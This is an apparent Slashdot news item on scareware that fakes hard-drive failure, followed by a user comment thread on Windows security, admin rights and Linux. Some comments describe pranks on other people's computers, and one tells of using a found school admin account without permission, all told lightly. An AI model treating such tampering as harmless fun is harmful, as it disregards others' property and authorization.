New Malware Simulates Hard Drive Failure

An anonymous reader writes "A nasty strain of malware goes beyond mere sensational alerts, it makes it seem the user's hard drive is failing. It moves files from All Users and the current Windows user's profile into a temporary location, making it appear as though problems with the hard drive are causing files to disappear. It also disables a user's ability to change wallpaper images and sets registry keys to hide certain icons — giving the impression that programs are going missing as well. Of course, it's all done in an attempt to get people to buy the software that will fix it."

Hey buddy!

[MrEricSir]

Nice computer you got there. Would be a shame if anything were to happen to it. My buddy Vinny here, he sells "protection" against these kinds of problems. You pay every week, and there ain't gonna be no problems, capiche?

Re:Hey buddy!

What is a "All Users" and what do you mean "Windows"? This is a basement! I have only doors! And I'm the only one here.

Re:Hey buddy!

Italians are not a race. They are a nationality.

Re:Hey buddy!

[wmbetts]

They're not?

Re:Hey buddy!

[blair1q]

Racists don't get to define the semantics of their demonization.

Re:Hey buddy!

[R3d+M3rcury]

This reminds me of a funny trick to play on somebody from back in my mainframe days...

Create a directory with the same name as the home directory inside the user's home directory. Set a login script to place the user into that directory.

So they try to get to their files and there's nothing there. Everything looks normal. Usually, someone with half-a-clue can figure it out pretty quickly, but it does provide that brief moment of terror that gets the blood pumping in the morning.

Re:Hey buddy!

the word you're looking for is bigot in this case

Re:Hey buddy!

[ozmanjusri]

what do you mean "Windows"?

"Windows" is a computer operating system used by many people, most often without the owner's permission.

Re:Hey buddy!

that reminds me of a trick I used to play back in my mainframe days too. I'd just delete everything a user had in their directory. Man you should have seen the look on their faces. I'll never forget the feeling over power I experienced either....

Re:Hey buddy!

[PCM2]

Actually I think the word you both are looking for is "straw man."

Re:Hey buddy!

Nowadays it's more fun today with mount --bind over the top of their home directory..

Re:Hey buddy!

[mcavic]

Or in the DOS days, create a RAM disk and substitute it for Drive C. Very convincing.

Re:Hey buddy!

[MstrFool]

There was a prank going around the Gateway 2000 tech centers that I found quite amusing. Do a screen-shot of the desk top, set it as the background, then move the icons to a folder. I found it really showed the clued from the clueless. Quite a few techs called for some one to fix their system. And no, i wasn't the one doing it, though I was the one to fix it many times.

Re:Hey buddy!

[geminidomino]

Well he did say (or rather, misspelled) "capisce," which is an Italian word...

Re:Hey buddy!

[geminidomino]

Here, you dropped this:

<clickety-click>

You Bastard.

Re:Hey buddy!

[Aeternitas827]

God bless sudo.

Re:Hey buddy!

[dragonturtle69]

Did that once, and once only. The butt of the joke hard booted thinking that his PC was non-responsive, fraking up his HKLU (silly registry, why?). "Last Known Working" was my friend that day....

Re:Hey buddy!

[Aeternitas827]

Did this on HS with an admin account I found perusing the Active Directory. Except, instead of moving the icons, I used a VBScript-created error box that looked real bad, and wouldn't go away when clicked on (it was there in the screencap).

The freshmen and teachers panicked for a few minutes, and a day or two later, that admin account was gone. But not the other two, named Test2 and Test3.

Re:Hey buddy!

[arth1]

Yes, cause it seriously needs it.

Using sudo to do the job of chmod, chown and setfacl is like using "kill -9" as your standard way of stopping processes, or like changing the DPI to get larger text. It gets the job done, much the same way as using a sledgehammer to swat flies; you risk doing a lot of damage and there are better suited tools available.

Re:Hey buddy!

[Fjandr]

I had a friend who wrote a small BASIC script that simulated a FORMAT prompt, which would proceed regardless of what the user selected. It then returned a prompt with an empty disk, complete with a bunch of basic, apparently functional commands.

That was amusing when it was run on a couple of the lab computers.

Re:Hey buddy!

[SheeEttin]

Yeah, that one's timeless. There's also a variant in which you set the desktop to a broken-LCD image (i.e. corruption, garbage) and hide the icons and taskbar.
Of course, the fact that the cursor still works would be a giveaway. (Unless you change that too--but that's a bit too much.)

Re:Hey buddy!

Exactky http://www.youtube.com/watch?v=6oi5g71h5AY&feature=related

Re:Hey buddy!

[Aeternitas827]

You're right, those are all examples of overkill.

However, it is about the only way to get the woman in your life--mom or significant other--to make you a goddam sandwich.

Re:Hey buddy!

[superdave80]

But he's not racist, since Italian is not a race. So he CAN define the semantics of his demonization. See, it all works out!

Re:Hey buddy!

[Isaac+Remuant]

Be careful with this if you are not 100 % sure you'll be around to uncover the prank if it gets out of hand.

I played this once on a half computer tech, half sound tech and things went pretty bad. I hid and locked the taskbar and all the icons (on XP) and stored them in some other folder for easy recovery. But I didn't go to work the following day due to personal reasons. It turns out, this guy and an engineer went nuts over the problem and ended up going back to a recovery point.

I neglected to tell him the truth until I was sure he had cooled off... About, 10 months. :P

Again, careful with what seem like innocent pranks, victims can end up doing a lot of damage and it will be your fault.

Re:Hey buddy!

[binarylarry]

Touche

Re:Hey buddy!

[tlhIngan]

The best way to do this prank is to not move ALL the icons away. Leave a few of them there so they work. It'll puzzle the hell out of them as they can't seem to figure out why some icons work (consistently, too) but others just refuse.

You'll also find out who notices that the icons highlights.

Re:Hey buddy!

[snemarch]

HKLU - the unholy bastard child of local machine and current user; making-of flesh movie coming to a theater near YOU!

Re:Hey buddy!

[Oligonicella]

I never understood nor looked on with anything other than raw hate, fucking around with another person's work or personal machine. You're deciding for your personal, shallow jollies that someone else's property and time have no value other than to amuse you. Do that to mine and there will be definite and unavoidable physical violence. I will even get fired to do it.

Re:Hey buddy!

And in fact, Linux, *BSD, etc are not in fact "Operating Systems", they are "Cooperating systems".

Re:Hey buddy!

[blair1q]

he's a racist.

only racists use that argument.

The Game of Catchup

[MightyMartian]

Had this one get on one the computers I administer. Managed to poison the profile and for a brief while I thought the files had been deleted. Of course, I got the inevitable "isn't your AV and anti-malware software up to date", to which I responded "As much as can be, the user is relied upon not to be a simpering moron who clicks on every possible link."

Oh, and by the way, Microsoft, your fucking browser still sucks and is still atrociously insecure. Shape up, Redmond.

Re:The Game of Catchup

This is why the only solution is a GNU/Linux solution. You tell people two simple things. Click the update button when the updates happen and don't download ANYTHING. If you want a program click the Ubuntu Software center and search for it. Everything else is going to potentially infect you.

Re:The Game of Catchup

[Moryath]

This is also why end-users shouldn't have install rights. Period.

Re:The Game of Catchup

[bleble]

You tell people two simple things. Click the update button when the updates happen

How do you think that will work out? The bad guys will just craft their website to look like an update and the user will stupidly run it just like before.

Re:The Game of Catchup

I got this virus the other day, running Firefox on Vista Ultimate 64 bit :(

Not sure this one is an IE issue. Had Trend Micro business security on here as well and that sure as hell didn't catch it either ;/ Managed to remove it easily enough in safe mode though - although it was largely manual.

Re:The Game of Catchup

[The+Dawn+Of+Time]

"it's like a computer, only useless."

Re:The Game of Catchup

Blame the browser, but not the simpering morons, since this time they don't have to click on anything in IE -- had this happen to me a week or two back. Work machine, XP, admin account, and only IE8 allowed. (Yeah, my employer seems to hate themselves pretty badly.)

Re:The Game of Catchup

[somersault]

What "useful" stuff do you need installed that you can't ask IT to install?

Re:The Game of Catchup

[gad_zuki!]

>Oh, and by the way, Microsoft, your fucking browser still sucks and is still atrociously insecure. Shape up, Redmond.

Really? Care to point to some statistics showing me big holes in IE9 that are actively used by malware?

Not much out there. Oh, there's no shortage of Java, Flash, and Adobe Reader holes, and according to stats lifted from crimepacks those are the ones used.

I just looked at that stats on my website. 90% of those users have Java installed. How many of those are the latest version? Maybe 50% Most of the flash installs are not the latest version. Who knows what version of Reader they have.

Plugin security is a nightmare right now. Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash. Joe User has no idea what he's doing with a computer. Blaming MS isn't really helping him.

Re:The Game of Catchup

[uctechdude]

>Really? Care to point to some statistics showing me big holes in IE9 that are actively used by malware? Microsoft has a relevant web browser??? I thought Java and Flash were exploits for IE. Both have updaters but you don't _have_ to install them. There is no forced update like chrome uses.

Re:The Game of Catchup

[Moryath]

Nothing, really.

Especially in the days when a simple Remote Help session to take screen control and approve/deny the program is all that's needed.

If you're going to have end-users running with install rights, you're going to have orders of magnitude more infections. Partly because they are going to reflexively "click yes" on every single thing they see, partly because you're going to have a defined population of users who are the kind of morons who install every "ooh look it's free" widget from Bonzi Buddy to Weatherbug and all the tagalongs and security holes that come in along with them.

Re:The Game of Catchup

[mrnobo1024]

That's all well and good in a corporate environment, but do you really expect every home user to have his own personal IT department?

Re:The Game of Catchup

[MightyMartian]

As I said, the user could not install the malware on the system, but they had execution rights to their own folders, so it poisoned their profile. I was going to implement a GPO-based SEP, only to find out it's trivial to bypass.

Re:The Game of Catchup

[19thNervousBreakdown]

Anything I want to use less than two weeks from now.

Re:The Game of Catchup

Just out of curiosity, how is IE9 "atrociously" insecure? I use it as much as Firefox and never had any issues.

Re:The Game of Catchup

[MobileTatsu-NJG]

This is why the only solution is a GNU/Linux solution..

I'd love to see your MRI scan while you tell people this.

Re:The Game of Catchup

[machine321]

Java and Adobe reader *do* have autoupdaters. How do you think toolbars get installed?

Re:The Game of Catchup

[PsychoSlashDot]

This is why the only solution is a GNU/Linux solution. You tell people two simple things. Click the update button when the updates happen and don't download ANYTHING. If you want a program click the Ubuntu Software center and search for it. Everything else is going to potentially infect you.

That's cute, but if users were inclined to obey exactly those instructions, Windows would be fine.

Re:The Game of Catchup

[Attila+Dimedici]

Except that Windows does not have anything like the Ubuntu Software center, or whatever the repository is called in other distributions.

Re:The Game of Catchup

No, don't blame the browser. Blame either: the adobe vulnerability that allowed the exploit or the IT dept. that didn't patch the exploit or allowed the user to run with admin rights. The browser had nothing to do with it. As mentioned above, you get the same thing using Firefox - since the exploits are Flash or Adobe Reader the browser really has nothing to do with it.

Re:The Game of Catchup

After recieving my ThinkPad W520(i7-2920XM) from lenovo which came with WIN7(aka NTv6.1) Professional. I wanted to see what Windows 7 looked like, so after the first boot and loging in. I checked to make sure i was admin, i tried to run gpedit, nope access denied, so then i tried wmic, also access denied. So after about 4 minutes after first boot i realized Microsoft was once again selling there software with all the doors open, i power off and pulled out my Red Hat CD.

The only version of window you have a chance of securing is Ultimate, and then you'll later find out theres been backdoor open since 1997. And then there are those people that use virus scanners, yea i'm gonna pay some company to install a root kit on my computer yea right. And then you have this other group that use free virus scanners, what are you just stupid.

Re:The Game of Catchup

[Bacon+Bits]

My relatives certainly seem to think they do.

Re:The Game of Catchup

[toadlife]

And when when Ubuntu moves from 1% to 85% of the desktop market share (any day now, right?), we'll get to see how well that repository model scales.

Re:The Game of Catchup

[bensode]

Except that Windows does not have anything like the Ubuntu Software center, or whatever the repository is called in other distributions.

Sure it does. I believe it rhymes with torrent.

Re:The Game of Catchup

[LurkerXXX]

Bah, I'm at a major research hospital. The inept IT department has us all on IE6.

Re:The Game of Catchup

[Attila+Dimedici]

If you think that is the same, you have not worked with Linux.

Re:The Game of Catchup

[Attila+Dimedici]

That is certainly a possibility. However, the repository model does certainly provide for much greater security, especially when it contains such a large range of free software as most current Linux distributions. Considering that the Apple IOS app store model is the same sort of distribution model it seems likely that it scales.

Re:The Game of Catchup

[Moryath]

No, but why should they be running as superuser just to open their email client?

Re:The Game of Catchup

Our IT department has a very narrow concept of what is useful: MSOffice, the various corporate database software packages, group email and that's pretty much all they are willing to manage for my dept. If we want anything else, we pretty much have to purchase and install it ourselves out of dept budgets or our own pockets. What about all the little utilities and other essential but unsupported software that makes my workday so much easier? UltraEdit, ACDSee, Teleport Pro, SecureCRT, VNC, Photoshop, Acrobat, CorelDraw, WinAmp and VLC (for background music or lunch breaks), Firefox, Mozilla Prism (awesome app BTW), Truecrypt, Vice Versa for backup, DragonDictate... that's just off the top of my head. I rely on all those apps to "do my job" in the most efficient manner, but most are not IT supported. So I insist that any pc IT provides has me listed as an admin with install rights. The general IT bias is against this concept, but in the real world people are much more productive when they don't need to beg the helpdesk staff ever time they want to install something, or justify it's use to a committee.

Re:The Game of Catchup

[RobbieThe1st]

Except that it won't: The user'd have to:
1. Click on the fake link.
2. Accept the file download(FF at least asks you to save or cancel with any download)
3. Right-click the saved file, click properties, and check the 'make excecutable' button.
4. Double click on the application, and then enter your password.

I think that'd take some doing to convince the user to do all that, especially when the user's used to clicking on the Main Menu -> System -> Update or w/e.

Re:The Game of Catchup

[hairyfeet]

You forgot the third part...spend endless hours on the forums cursing because "update foo broke my (insert device) drivers!". Seriously someone needs to hunt down Torvalds and give that sucker a good ass kicking.

It is 2011 and he still acts like it is 1992 and the kernel is his personal playtoy. Every single decent OS, OSX, Windows, Solaris, BSD, hell even OS/2, has had driver level ABIs for a decade or more, yet Torvalds still refuses to allow this simple fix to keep from borking everything when he gets an itch to fuck with shit.

So I'm sorry but as a retailer that step three makes it so I'm unable to sell machines with your OS, or support your OS after the sale. The annual forum hunts just suck too much of my already limited time. Fix that and the whole "software tied to which kernel your using" mess and then I'll be happy to help your OS grow in numbers, but as it is now it is better to stick with Windows, even if the occasional user stupidity manages to get through the AV (usually because they tell the AV to allow it because the malware promises them some reward for doing so) than to have the guaranteed breakdown every six damned months for the life of the machine thanks to Torvalds and his kernel fucking.

Re:The Game of Catchup

[Ihmhi]

Here's what works for me. "If I were a plumber, I sure as hell wouldn't unplug your toilet for free. That's my livelihood, and the only person who gets a blank check in my business is my mom."

Re:The Game of Catchup

Mod parent insightful.

Re:The Game of Catchup

[CrankyFool]

Actually, you've got some good ideas, but once they're implemented, you no longer need GNU/Linux.

My life's been far better since I rebuilt my parents' computer with Windows 7 and then made it so they were not admins/power users, so they couldn't install anything.

Re:The Game of Catchup

[whoever57]

Plugin security is a nightmare right now. Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash

I do blame MS. Not for vulnerabilities in Flash, Java and other plugins, but for not providing an API that would allow third party programs to plug into Windows update to automatically download (which could be from the vendor's site) and install the update.

How many different updaters does a system need? Then, there are updaters that simply don't work unless you are logged in with admin privileges (I'm looking at you, Apple -- sure it downloads the new release, but then it fails to update -- what's the use of that?).

Re:The Game of Catchup

[laurelraven]

My solution is simpler for my users: they just do their work. Their systems magically update themselves at night (we disable rights to shut down their machines), scan themselves at night, and their user accounts have no local admin rights on their machines.

When I ran into an example of this, I remotely rebuilt the person's profile and the infection was effectively gone (or at least neutered, and my AV took care of the trailing bits). If that hadn't taken care of it (through some local rights escalation vulnerability or other), I would just drive over to the site with my external hard drive and a copy of clonezilla and have them back up to normal with a brand new copy of my corporate image in half an hour.

Its not worth the time and hassle to fight these things anymore. When the infection appears, just carpet bomb: it's much faster, and much more likely to work, and the user loses almost nothing.

Re:The Game of Catchup

[laurelraven]

For the sake of your point, it does: Windows Update. Further, I can easily set it so it automatically runs without their intervention.

I'm user you could do that with Ubuntu, as well...

Let me be clear: I'm not a Microsoft fanboi or shill, and in fact prefer Linux. I also don't hate on Microsoft like I used to, and see its use and benefits. Its security and update model may not be up to Linux standard yet, but they are showing a lot of progress and promise in that direction; they likely will never quite get there, but they are trying. I can lock a Windows network workstation up pretty well, and administer hundreds of boxes and users mostly by myself thanks to a lot of the built-in automation they have like GPO. Sure, I could do that with Linux, but it would take one hell of a lot longer, time I just don't have with as large a user base as I have to work with.

For my environment, Microsoft is also cheaper. Time IS money in the business world, and with non-profit licensing, MS is not really all that expensive, either.

Every environment is different, and has different needs. I can't even get my users to lock their systems when they walk away from their desktops, and that is just a two-key combination (window-key+L). Do you really think I can expect ALL of them to click on "Update" whenever they see it?

Re:The Game of Catchup

[inflex]

Agreed. Even if the ABI over time supports less and less of the available functionality at least it's -something- that's stable. The fact that linux does have as many drivers as it does is testament to the persistence of the masochists out there. I appreciate what Linus is trying to avoid but at the same time we're getting to the point where the kernel needs to offer an olive branch to people who have more to do in their lives than just update their driver code every time the kernel twists and turns.

Re:The Game of Catchup

[toadlife]

Or it could be a deb/rpm/xxx package and the luser would happily enter their password when prompted after clicking on it.

Re:The Game of Catchup

[laurelraven]

I insist that any pc IT provides has me listed as an admin with install rights.

If you were in my environment, I would deny that request. What makes you better than everyone else? How is IT supposed to adequately manage their systems if everyone is a mini-admin? Sure, you personally may not cause me any headaches, because you know what you are doing...however, everyone thinks they know what they are doing. I'd rather take the time to vett the software my users need, not from a need to control everything, but from a need to be able to manage my network.

Some are just doing it for a power trip...they are usually easy to spot, as they won't help you install anything unless you cow-tow to them just the right way. I just want to make user it isn't a virus and isn't going to interfere with the operation of other critical software on the machine.

I'd find the other side of the coin frustrating to be on, granted...however, remember there is often a good reason it is that way.

Re:The Game of Catchup

[Billly+Gates]

IE 9 has the most security out of box than any browser to date with full XSS protection and memory exploit protections. It is sweet. Sure Firefox has no script but it is not installed by default. Does Chrome have XSS cross site protection?

IE 9 is the first IE that doesn't suck. I am using it right now and it scrolls smoother and offers better acceleration than both Firefox or Chrome. I highly recommend Windows users upgrade even if they use other browsers as many apps use HTML embedded as IE helper objects for their guis and it is nice to have acceleration and more protection.

I still use forefpx mostly by the way and I am not a MS fanboi.

Re:The Game of Catchup

[RobbieThe1st]

Ah, but there's a few problems with that:
1. No universal package. So, you can guess deb and be right for that 50 percent(at best) of the Linux using population, but still... You've halved the number of potentially infectable systems.
2. Some distributions don't have such a GUI method; Debian for example. Which limits your malware's influence even further.
3. Gdebi, at least, comes up with a big red warning if you try to install an unverified package, which should provide /some/ security.

4. Any multi-user system, corporate install or geek-installed system will probably not allow sudo or root access to our luser's account, meaning that such an install won't work. The previous idea of a downloaded excecutable is more likely, as it could run using user permission.

I just think it'd be a lot harder than it would be on Windows or Mac, because on Linux everyone's used to using the repos for installing everything - Install by doubleclick isn't going to be done by accident.

Re:The Game of Catchup

[RobbieThe1st]

I might add to this that in the case of lusers who can't and won't learn, we have the solution also: A Chromebook. Impossible to screw up, and it runs Linux also.

Re:The Game of Catchup

Repositories scale, jackass. Fucking mouth breathing Windows using motherfuckers. Did your mother change her mind in the middle of the abortion after only a third of your brain had been sucked out?

Re:The Game of Catchup

[FrellMeDead]

This has nothing to do with the type of browser the user uses. A large number of infections occur as a result of poor user practices (I.E. User clicks on every link that they can). Some browsers can help protect from some of these infections as a result of the addons/plugins like noscript, etc. but in the end it's the user that is the real start and end of these issues. Blame the user instead of just slinging more B.S. towards Microsoft. Yes some problems especially in the past could/can be attributed with Microsoft's security implementation but they regularly issues patches and generally fix any known issues overall and have even provided free antivirus/firewall security. Place the blame where it is definitely due...on the user and those training the user(s).

Re:The Game of Catchup

Joe User has no idea what he's doing with a computer.

Because M$ hasn't designed their software for their target audience.

Software is soft, it can be anything we want it to be, yet apologists and shills for the vendors continue to claim it's anybody's fault but their own.

Blaming MS isn't really helping him.

Assigning the blame is entirely appropriate. In this case treating software installation as if it's a routine occurrence so users will ignore popups when they do occur and also not designing an OS, the operating system, to protect the entire system from malicious and broken software.

Re:The Game of Catchup

[hairyfeet]

Thank you! You are the FIRST one that hasn't screamed and reached for the pitchfork, even though as I pointed out every single other OS with any numbers at all has had this "feature" (which I wouldn't call a feature, just common sense design) for over a decade. The only answer you usually get is a link to the religious rant against ABIs, where the writer goes so far as to call those that don't hand the developers ALL of their code "leeches" and hopes that Torvalds breaks their drivers often even when that bones the very users Linux so desperately needs.

Look Linux guys, I'm a small town computer retailer the kind of guy you want on your side because MSFT doesn't give us any breaks (I use System Builders and OEM) and I actually care about my customers and want them to have a safe and happy computing experience. Linux would mean less costs, so I would be able to sell for lower prices or offer better hardware, it would be a win for me AND my customers!

But I simply cannot in good conscience offer your OS, when even with 20+ years of computing experience I often bash my head against the wall fighting the damned thing! An update should never break drivers okay? And certainly not when you are cranking out said updates on a 6 month schedule. At that pace just as you get the thing finally running stable here it comes! yet another week or two spent scouring the web looking for "fixes" that involve huge messes of CLI that must be typed PERFECTLY or they cause havoc. Do you HONESTLY think I can offer that to my customers? People who just want to use a PC, not get an education in Linux forums and Bash commands?

And before anybody says LTS let me say that LTS is a really bad joke, because as long as software is tied to which kernel you are using LTS is simply a codeword for "can't use any new software" and the fact that software is actually tied to which kernel you have just shows the madness that is the kernel situation!

I want Linux to succeed, I really really do. I have written articles pointing out what needs to change for small businesses and retailers to embrace Linux, and I remember the days of OS/2 and GEM and Commodore and how nice it was to actually have plenty of choice. But the current situation in Linux on the desktop is like a bad joke, with broken drivers, constantly shifting internals, user programs tied to which kernel you are using, dependency hell like the old days of Win9X, and to top it all Torlvalds constantly making major changes which breaks programs and drivers left and right without a care in the world, like the kernel is his personal plaything and not the center of a multibillion dollar OS with millions depending on it.

So please Linux users, demand change. Demand Torvalds give a functional ABI or step down so someone else can give you what everyone else has had for over a decade, demand that while CLI still be optional that all software be usable without it, demand stability and the ability to keep software past an update, and demand that the 6 month update insanity be replaced with a more reasonable 3 or 5 year schedule, with plenty of beta testing before being handed to the masses. Because there are plenty of guys like me that would be happy to line our shelves with your OS, but as it is now just keeping the machines functional past updates would be a full time job. It is 2011, not 1991, and this is simply inexcusable.

Re:The Game of Catchup

[snemarch]

No, but why should they be running as superuser just to open their email client?

Beats me, that's why I have them run Vista (SP1 or later) or Win7.

The people who are going to ignore warnings and click yes on the UAC prompts wouldn't be any safer off on other operating systems, they'd happily type in their user credentials and get their fresh copy of Mac Defender or whatever.

Re:The Game of Catchup

[snemarch]

People are quick to slam IE, but in fact most malware goes in through Flash, Java or Acrobat Reader. Internet Explorer certainly isn't perfect, but security-wise it's come a long way; IE8 or IE9 combined with Vista/Win7 on proper UAC'ed accounts is actually pretty decent these days, and the sandboxing helps a fair amount against exploits for the aforementioned three pieces of crapware.

That said, I run FireFox even though it's technically less secure - I prefer the higher HTML standards compliance and addons.

Re:The Game of Catchup

[snemarch]

They aren't full-auto, though, and check for updates relatively seldom. And when Joe User sees a "please shutdown your browser to install update" right in the middle of his browsing session, he's going to click "nah, postpone" and forget all about it. Until next time the prompt pops up... in the middle of his browsing session. The Flash updater is notoriously lame, not offering a "retry" button.

Re:The Game of Catchup

[snemarch]

If Microsoft opened up Windows Update for 3rd-party applications, how many do you reckon would actually use it?

Yup, it would be sweet to have one central updating facility, and it's one of the few *u*x things I miss in Windows; I just don't see it ever going to work in the Windows ecosystem (an Appstore for phone/tablet might, but that wouldn't cover desktops and legacy software).

Re:The Game of Catchup

[snemarch]

[...]and also not designing an OS, the operating system, to protect the entire system from malicious and broken software.

The OS is designed with a lot of protection, do check up on the NT security model. The problem consists of

• 3rd party developers who have been ignoring application design guidelines.
• Users who click yes to anything and enter user credentials without thinking.

Re:The Game of Catchup

[Attila+Dimedici]

No, MS Update is nothing like the Ubuntu Software center (or the software repositories on other distros). You cannot get software from Windows Update.
You apparently misunderstand my point. I am not saying that Ubuntu (or Linux in any form) is the end all and be all. My point is that the original poster had a point. The Linux model of software repositories of safe, free software for just about every conceivable purpose means that if I want software to do something that isn't important enough to spend money on it I don't have to search the web and risk that the software I find is malware (or contains malware).

Re:The Game of Catchup

[PsychoSlashDot]

No, MS Update is nothing like the Ubuntu Software center (or the software repositories on other distros). You cannot get software from Windows Update.

When you say "cannot", do you mean can? Admittedly the list is very small by current design, but Microsoft Security Essentials is available for distribution via Microsoft Update. So is Silverlight, equivalent to Adobe Flash. So are the various .NET libraries, equivalent to Java.

But really, let's return to the original point. Typical malware infections aren't about the user trying to get their hands on some software. They're about compromised web sites serving up content that looks remarkably like legitimate OS security interfaces which then tell they user they're infected, and telling them where to click to perform a security scan. The user clicks, the user infects the PC. Much of this doesn't rely on OS or browser vulnerabilities, though they may be exploited as well as the social engineering.

The original comment I replied to told users "two simple things"; click the updates button when updates happen and don't download anything. My point remains that getting users to understand and abide by those rules isn't any more practical on a non-Windows platform than it is a Windows platform. "You told me update when it says update, so I figured scan when it says scan is the same thing." That's what you'll get. By definition with social engineering the user is vulnerability. Changing time zone, clothing style, or operating system won't change that.

Re:The Game of Catchup

[Waccoon]

Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash.

I've used Autoruns to try to disable anything from Adobe from running on my computer when I start it. Yet, every time there's a Flash update, I get a pop-up at system boot telling me to update. I've dug through the registry, the startup menu, services, disabled it in IE... everything... and I can't figure out how it keeps running. Flash needs admin access to install. Is it using some kind of root hack to make sure the updater runs?

I'm not sure why you're saying Flash doesn't have an auto-update, because I have it, and I can't find any imaginable way to shut it off!

Re:The Game of Catchup

[fast+turtle]

Buzz!! Turn in your geek card as both Java and Adobe have autoupdaters. The problem is that both of them require admin rights to even run. Admin rights are fine for the installer but not the damn updater which should be just a simple downloader but no, both of them believe they're the only software that should be running on your computer, so want admin rights to fuck things up.

On my home network, I've configured all users as limited accounts w/o rights to install any software. I've also set a strong admin password and I don't install Java as we have no need for it. In regards to Flash and Reader though, I'm stuck because we have PDF docs that simply don't work with any of the others (depend on the latest formats) and flash is used by to many games. At least I've managed to switch them to FF 4 with noscript and have set it to block all plug-ins other then for specific whitelisted sites.

Re:The Game of Catchup

[h4rr4r]

Close but dependencies are not shared, so you still get multiple out of date libs.

Re:The Game of Catchup

[h4rr4r]

Which drivers?
Name some specifics you troll.

Also 1 in 14 downloads on windows is malware, that is sure going to be breaking machines more than every 6 months.

Windows will be usable when it has lsof, can replace in use files, and in general starts acting like a multi-user OS.

Re:The Game of Catchup

[h4rr4r]

Save yourself the drive, setup a fog server. Could be a netbook with an external USB hard drive. The machines are set to attempt PXE boot and if scheduled to get a new image they do.

Re:The Game of Catchup

[h4rr4r]

My IT dept is happy to do such a thing. You just have to sign a little form that lets you know under that setup no troubleshooting nor assistance can be given and the only support in case of issues is to reimage the machine. In reality support is given, but not to the degree a regular user gets and if you lose data TFB.

Re:The Game of Catchup

Actually the exploit is java based, it works on ALL browsers not just IT.

It also replaces MS security essential to its fake software.

Its pretty widespread, the symptoms are ever changing now. Not only does it hijack browsers, give you fake hardrive errors, it also opens all windows firewall ports.

Re:The Game of Catchup

[h4rr4r]

Inept or stuck supporting applications and/or websites that require IE6?

The place I work at just move the majority of the windows users to IE8, they had been on IE6. This is because a client we work for requires we use some of their inhouse software that actually uses the trident rendering engine and until a couple months ago only worked with IE6.

Re:The Game of Catchup

[jimicus]

Windows actually has most of the features necessary to make it a lot more secure. The problem is that very few people use them (hell, many people don't even know they exist) because of the inconvenience such features would incur. To make life easier, Microsoft even released a tool for XP and Vista called SteadyState.

Windows 7 has most of the same features baked in but I reckon it's a step back because SteadyState provided a nice, unified, idiotproof GUI for setting the system up in this fashion that didn't require you to step through several hundred irrelevant options. That aspect of SteadyState hasn't been baked into Windows 7.

I don't think Linux is the solution it's sometimes painted as for a number of reasons:

1. Many pieces of malware don't depend on OS behaviour to spread, they depend on human behaviour. Which you can't patch by upgrading the OS their PC runs.
2. As Linux distributions mature, they're appealing to people who don't understand (and don't wish to understand) any of the underlying technology. Case in point: the number of people in any Linux discussion who say "I don't like SuSE because it didn't set up (whatever), but Ubuntu did". Even though the (whatever) in question invariably has more to do with underlying tools common to any Linux distribution, and it's just that Ubuntu ships with a configuration that suits the user better. It would have been considerably less upheaval to learn how to configure the underlying tool than to wipe and rebuild, but that would require learning beyond what the GUI provides.

It's only a matter of time before someone puts together a Linux distribution that uses something like an SQLite database to store configuration and includes an application that automagically generates appropriate config files at boot - and therefore such config files must be treated as readonly because they'll be wiped at boot. I already know of one embedded product that does almost exactly this.

Re:The Game of Catchup

[jimicus]

Solution to 1 and 2: Statically-linked binaries.

In fact, I'm pretty sure it's a solution to 3 as well. Does the ELF format even include a specification for signed binaries?

You've touched on something that will help with 4. Mounting /home with noexec is the final piece of the puzzle.

Re:The Game of Catchup

[jimicus]

The problem you describe isn't exclusive to the Linux kernel by any means. I have seen more-or-less the same sequence appear in all sorts of places - OpenLDAP's done it with multimaster replication (and still is doing it with server-side sorts), FreeBSD has done it with journalled filesystems, The Gimp is doing it with CMYK support and I don't doubt there are other pieces of software doing the same thing.

The sequence of events generally goes something like this:

1. A specific F/OSS product is missing a particular feature. It may or may not be particularly important, but it's missing for whatever reason.
2. That feature starts to appear in other software. Maybe commercial software, maybe other free software. In any case, it starts to appear. The person(s) behind the product being discussed don't think it's particularly important and make the conscious decision to ignore it.
3. It becomes apparent that the feature in question is actually quite useful. But it still doesn't get implemented because that would mean the person who made the original decision not to would have to admit they were wrong - something that many people find very difficult. Anyone questioning this is told "submit a patch" - but it's far more likely they'll just use something else, something that does meet their needs.
4. It becomes apparent that the feature in question is not useful, it's essential. Still it doesn't get implemented - if anything, the person who decided not to implement it will become ever more vocal in their criticism of the feature. I have actually seen people put together stonking great essays on how the feature is unnecessary - maybe even harmful - to back up this view. It's far too late, of course - by this time it's crystal clear to any impartial observer that the original decision was poor, and anyone still defending it is deluded.
5. A patch to implement the feature is accepted and the feature is announced with much fanfare at the next major release. No mention of the previous view is made.

(WTF slashdot? No ordered lists?)

Re:The Game of Catchup

[Oligonicella]

Thank you for this illustrative example of exactly why Linux is making such inroads into everyday use. You, for most of the public, are the face of Linux.

Re:The Game of Catchup

[Oligonicella]

Acrobat Reader is easy. Replace it with a clone. They don't have the specific attack points. Works fine for me, even tested it against a known pdf infection.

Re:The Game of Catchup

[BrokenHalo]

I find it incredible to see how many mission-critical applications are still entrusted to Windows. For instance, I'm sure I'm not alone in having seen BSODs on every screen at an airport or on an ATM. That doesn't (necessarily) mean it's actually insecure, but it does mean the software is still not stable enough to run anything important.

However, to briefly digress to the actual topic of the thread: If a bunch of guys are unprincipled enough to infect people's machines with malware, why (oh why) are some people so damn fucking naive as to pay out a ransom to them for some dubious "fix"?

Re:The Game of Catchup

[snemarch]

Yup, I use Foxit Reader on my Windows boxes - it's slow for complex renders though, I wish Sumatra was more stable. But AR is the default used by the masses, and it may be mandated by corporate IT policies.

Re:The Game of Catchup

I set ALL my users to be normal users. I tell them the admin accounts (if they ask which they rarely do). Including myself. It cuts many viri off at the knees. Many expect to be an admin...

A quick users account cleanup is way easier than full on computer reinstall. I tell people why I do it and they instantly go 'hey that is a good idea'.

Run that way yourself. You still have admin if you need it. You will find you rarely do. Unless you develop programs.

Re:The Game of Catchup

[Khyber]

"I run FireFox even though it's technically less secure"

NoScript and ABP are all I need. Haven't been hit by shit, EVER.

Re:The Game of Catchup

[LurkerXXX]

We wanted some storage for some images we need. About 1 TB.

They charged us $50K to give us 1TB of storage in their SAN.

When we download from their storage server, the best any desktop can do is get 0.15 MB per second. It's been a year and they can't make it do any better, so we host it ourselves locally (encrypted far better then theirs I'm sure).

Inept.

Re:The Game of Catchup

[Khyber]

"IE 9 has the most security out of box than any browser to date"

